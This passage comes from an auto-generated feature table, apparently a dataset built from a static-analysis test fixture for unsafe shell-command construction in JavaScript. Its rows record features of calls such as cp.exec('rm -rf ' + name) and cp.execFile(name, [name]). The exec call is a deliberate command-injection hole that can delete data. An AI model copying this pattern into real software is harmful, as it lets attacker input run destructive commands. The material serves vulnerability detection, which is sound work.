printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:28:3:31 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:3 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:8 | cp.exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:26 | cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:5:4:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:5:4:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:5:4:8 | exec | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:5:4:8 | exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:5:4:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:10:4:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:10:4:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:10:4:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:10:4:18 | "rm -rf " | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:10:4:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:10:4:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:10:4:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:10:4:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:10:4:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:10:4:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:10:4:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:10:4:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:10:4:25 | "rm -rf " + name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:10:4:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:10:4:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:22:4:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:22:4:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:22:4:25 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:22:4:25 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:22:4:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:22:4:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:3 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:12 | cp.execFile | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:12 | cp.execFile | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:12 | cp.execFile | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:12 | cp.execFile | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:12 | cp.execFile | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:26 | cp.exec ... [name]) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:26 | cp.exec ... [name]) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:26 | cp.exec ... [name]) | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:26 | cp.exec ... [name]) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:26 | cp.exec ... [name]) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:26 | exceptional return of cp.exec ... [name]) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:26 | exceptional return of cp.exec ... [name]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:26 | exceptional return of cp.exec ... [name]) | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:26 | exceptional return of cp.exec ... [name]) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:26 | exceptional return of cp.exec ... [name]) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:5:6:12 | execFile | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:5:6:12 | execFile | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:5:6:12 | execFile | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:5:6:12 | execFile | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:5:6:12 | execFile | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:14:6:17 | name | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:14:6:17 | name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:14:6:17 | name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:14:6:17 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:14:6:17 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:14:6:17 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:14:6:17 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:14:6:17 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:14:6:17 | name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:20:6:25 | [name] | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:20:6:25 | [name] | InputArgumentIndex | 1 | +| 